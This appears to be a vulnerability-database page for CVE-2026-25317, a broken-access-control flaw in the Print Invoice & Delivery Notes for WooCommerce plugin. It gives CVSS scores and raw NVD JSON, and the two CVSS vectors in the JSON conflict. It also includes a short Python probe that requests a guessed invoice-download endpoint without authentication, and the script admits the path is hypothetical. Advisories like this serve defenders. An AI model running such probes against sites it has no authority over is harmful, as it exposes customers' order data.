Security Vulnerability Report
中文
CVE-2026-25317 CVSS 7.5 HIGH

CVE-2026-25317

Published: 2026-03-25 17:16:44
Last Modified: 2026-04-29 10:16:54

Description

Missing Authorization vulnerability in tychesoftwares Print Invoice & Delivery Notes for WooCommerce woocommerce-delivery-notes allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Print Invoice & Delivery Notes for WooCommerce: from n/a through <= 5.9.0.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Print Invoice & Delivery Notes for WooCommerce <= 5.9.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests def check_vulnerability(target_url): """ PoC for CVE-2026-25317: Missing Authorization in WooCommerce Delivery Notes This script attempts to access a restricted endpoint without authentication. """ # Example endpoint structure (needs verification against actual plugin routes) # This is a hypothetical path based on the plugin slug endpoint = "?wcdn=download&order_id=1&access_key=invalid" try: response = requests.get(target_url + endpoint, timeout=10) # If response is 200 OK and contains sensitive data (like invoice HTML), it might be vulnerable if response.status_code == 200 and "Invoice" in response.text: print("[+] Potential Vulnerability Detected!") print(f"[+] Response Length: {len(response.text)}") return True else: print("[-] Vulnerability not detected or endpoint patched.") return False except Exception as e: print(f"[!] Error: {e}") return False if __name__ == "__main__": url = "http://example.com/wordpress/" # Replace with target check_vulnerability(url)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-25317", "sourceIdentifier": "[email protected]", "published": "2026-03-25T17:16:43.970", "lastModified": "2026-04-29T10:16:54.187", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in tychesoftwares Print Invoice & Delivery Notes for WooCommerce woocommerce-delivery-notes allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Print Invoice & Delivery Notes for WooCommerce: from n/a through <= 5.9.0."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en tychesoftwares Print Invoice &amp; Delivery Notes for WooCommerce woocommerce-delivery-notes permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Print Invoice &amp; Delivery Notes for WooCommerce: desde n/a hasta &lt;= 5.9.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/woocommerce-delivery-notes/vulnerability/wordpress-print-invoice-delivery-notes-for-woocommerce-plugin-5-9-0-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}